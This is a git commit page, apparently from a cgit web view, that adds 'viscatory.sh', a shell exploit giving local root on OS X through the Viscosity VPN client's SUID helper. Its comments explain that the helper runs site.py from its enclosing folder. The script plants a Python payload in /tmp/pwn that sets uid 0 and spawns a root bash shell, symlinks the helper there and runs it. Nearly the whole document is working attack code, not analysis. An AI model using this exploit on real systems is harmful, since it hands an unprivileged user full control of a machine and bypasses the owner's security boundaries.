diff options
author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-08-13 05:51:52 +0200 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-08-13 06:00:11 +0200 |
commit | 0d36d2ec75f3098a3a250d84dc38962f0aedfeb6 (patch) | |
tree | 4c04426c47320b3c97404dc5fa4e9e706361a9d0 | |
download | Viscatory-0d36d2ec75f3098a3a250d84dc38962f0aedfeb6.tar.xz Viscatory-0d36d2ec75f3098a3a250d84dc38962f0aedfeb6.zip |
Initial commit of easy local root.
-rw-r--r-- | screencast.ogv | bin | 0 -> 304901 bytes | |||
-rwxr-xr-x | viscatory.sh | 32 |
2 files changed, 32 insertions, 0 deletions
diff --git a/screencast.ogv b/screencast.ogv Binary files differnew file mode 100644 index 0000000..b778bf8 --- /dev/null +++ b/screencast.ogv diff --git a/viscatory.sh b/viscatory.sh new file mode 100755 index 0000000..4f323b3 --- /dev/null +++ b/viscatory.sh @@ -0,0 +1,32 @@ +#!/bin/sh +# +########################## +# Viscatory # +# # +# zx2c4 # +########################## +# +# After the hullabaloo from the Tunnelblick local root, savy Mac users +# began defending Viscosity, another OS X VPN client. They figured, since +# they spent money on Viscosity, surely it would be better designed than +# the free alternative. +# +# Unfortunately, this exploit took all of 2 minutes to find. DTrace for +# the win. Here, the SUID helper will execute site.py in its enclosing +# folder. A simple symlink, and we have root. + +echo "[+] Crafting payload." +mkdir -p -v /tmp/pwn +cat > /tmp/pwn/site.py <<_EOF +import os +print "[+] Cleaning up." +os.system("rm -rvf /tmp/pwn") +print "[+] Getting root." +os.setuid(0) +os.setgid(0) +os.execl("/bin/bash", "bash") +_EOF +echo "[+] Making symlink." +ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root +echo "[+] Running vulnerable SUID helper." +exec /tmp/pwn/root |